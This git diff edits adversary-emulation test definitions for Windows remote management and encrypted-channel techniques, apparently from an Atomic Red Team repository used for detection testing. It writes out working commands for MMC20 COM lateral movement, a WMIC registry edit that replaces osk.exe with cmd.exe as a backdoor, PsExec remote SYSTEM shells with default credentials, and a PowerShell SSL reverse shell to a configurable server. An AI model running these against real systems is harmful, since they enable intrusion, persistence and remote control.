diff --git a/atomics/T1028/T1028.md b/atomics/T1028/T1028.md index d77820b7..8c71217e 100644 --- a/atomics/T1028/T1028.md +++ b/atomics/T1028/T1028.md @@ -63,11 +63,11 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer. | computer_name | Name of Computer | string | computer1| -#### Attack Commands: Run with `command_prompt`! +#### Attack Commands: Run with `powershell`! -```cmd -powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") +```powershell +[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") ``` diff --git a/atomics/T1028/T1028.yaml b/atomics/T1028/T1028.yaml index fa76b9a4..32c67e10 100644 --- a/atomics/T1028/T1028.yaml +++ b/atomics/T1028/T1028.yaml @@ -3,134 +3,134 @@ attack_technique: T1028 display_name: Windows Remote Management atomic_tests: -- name: Enable Windows Remote Management - description: | - Powershell Enable WinRM + - name: Enable Windows Remote Management + description: | + Powershell Enable WinRM - Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access. + Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access. - supported_platforms: - - windows + supported_platforms: + - windows - executor: - name: powershell - elevation_required: true - command: | - Enable-PSRemoting -Force + executor: + name: powershell + elevation_required: true + command: | + Enable-PSRemoting -Force -- name: PowerShell Lateral Movement - description: | - Powershell lateral movement using the mmc20 application com object. + - name: PowerShell Lateral Movement + description: | + Powershell lateral movement using the mmc20 application com object. - Reference: + Reference: - https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/ + https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/ - Upon successful execution, cmd will spawn calc.exe on a remote computer. + Upon successful execution, cmd will spawn calc.exe on a remote computer. - supported_platforms: - - windows + supported_platforms: + - windows - input_arguments: - computer_name: - description: Name of Computer - type: string - default: computer1 + input_arguments: + computer_name: + description: Name of Computer + type: string + default: computer1 - executor: - name: command_prompt - command: | - powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") + executor: + name: powershell + command: | + [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") -- name: WMIC Process Call Create - description: | - Utilize WMIC to start remote process. + - name: WMIC Process Call Create + description: | + Utilize WMIC to start remote process. - Upon successful execution, cmd will utilize wmic.exe to modify the registry on a remote endpoint to swap osk.exe with cmd.exe. + Upon successful execution, cmd will utilize wmic.exe to modify the registry on a remote endpoint to swap osk.exe with cmd.exe. - supported_platforms: - - windows + supported_platforms: + - windows - input_arguments: - user_name: - description: Username - type: String - default: DOMAIN\Administrator - password: - description: Password - type: String - default: P@ssw0rd1 - computer_name: - description: Target Computer Name - type: String - default: Target + input_arguments: + user_name: + description: Username + type: String + default: DOMAIN\Administrator + password: + description: Password + type: String + default: P@ssw0rd1 + computer_name: + description: Target Computer Name + type: String + default: Target - executor: - name: command_prompt - command: | - wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" + executor: + name: command_prompt + command: | + wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" -- name: Psexec - description: | - Utilize psexec to start remote process. + - name: Psexec + description: | + Utilize psexec to start remote process. - Upon successful execution, cmd will utilize psexec.exe to spawn cmd.exe on a remote system. + Upon successful execution, cmd will utilize psexec.exe to spawn cmd.exe on a remote system. - supported_platforms: - - windows + supported_platforms: + - windows - input_arguments: - user_name: - description: Username - type: String - default: DOMAIN\Administrator - password: - description: Password - type: String - default: P@ssw0rd1 - computer_name: - description: Target Computer Name - type: String - default: localhost - psexec_exe: - description: Path to PsExec - type: string - default: "C:\\PSTools\\PsExec.exe" + input_arguments: + user_name: + description: Username + type: String + default: DOMAIN\Administrator + password: + description: Password + type: String + default: P@ssw0rd1 + computer_name: + description: Target Computer Name + type: String + default: localhost + psexec_exe: + description: Path to PsExec + type: string + default: "C:\\PSTools\\PsExec.exe" - dependencies: - - description: | - PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) - prereq_command: | - if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1} - get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" - Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force - New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null - Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force + dependencies: + - description: | + PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) + prereq_command: | + if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1} + get_prereq_command: | + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" + Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null + Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force - executor: - name: command_prompt - command: | - #{psexec_exe} \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe + executor: + name: command_prompt + command: | + #{psexec_exe} \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe -- name: Invoke-Command - description: | - Execute Invoke-command on remote host. + - name: Invoke-Command + description: | + Execute Invoke-command on remote host. - Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`. + Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`. - supported_platforms: - - windows - input_arguments: - host_name: - description: Remote Windows Host Name - type: String - default: localhost - remote_command: - description: Command to execute on remote Host - type: String - default: ipconfig - executor: - name: powershell - command: | - invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} + supported_platforms: + - windows + input_arguments: + host_name: + description: Remote Windows Host Name + type: String + default: localhost + remote_command: + description: Command to execute on remote Host + type: String + default: ipconfig + executor: + name: powershell + command: | + invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} diff --git a/atomics/T1032/T1032.md b/atomics/T1032/T1032.md index 5fa35b0f..08b6e2bb 100644 --- a/atomics/T1032/T1032.md +++ b/atomics/T1032/T1032.md @@ -35,7 +35,7 @@ Upon successful execution, powershell will make a network connection to 127.0.0. ```powershell $server_ip = #{server_ip} $server_port = #{server_port} -$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port}) +$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}') $stream = $socket.GetStream() $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])) $sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false) diff --git a/atomics/T1032/T1032.yaml b/atomics/T1032/T1032.yaml index f238ca06..f939093f 100644 --- a/atomics/T1032/T1032.yaml +++ b/atomics/T1032/T1032.yaml @@ -11,18 +11,16 @@ atomic_tests: https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926 Upon successful execution, powershell will make a network connection to 127.0.0.1 over 443. - + supported_platforms: - windows input_arguments: server_ip: - description: - IP of the external server + description: IP of the external server type: String default: 127.0.0.1 server_port: - description: - The port to connect to on the external server + description: The port to connect to on the external server type: String default: 443 executor: @@ -31,7 +29,7 @@ atomic_tests: command: | $server_ip = #{server_ip} $server_port = #{server_port} - $socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port}) + $socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}') $stream = $socket.GetStream() $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])) $sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false) @@ -45,6 +43,3 @@ atomic_tests: $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()} - - -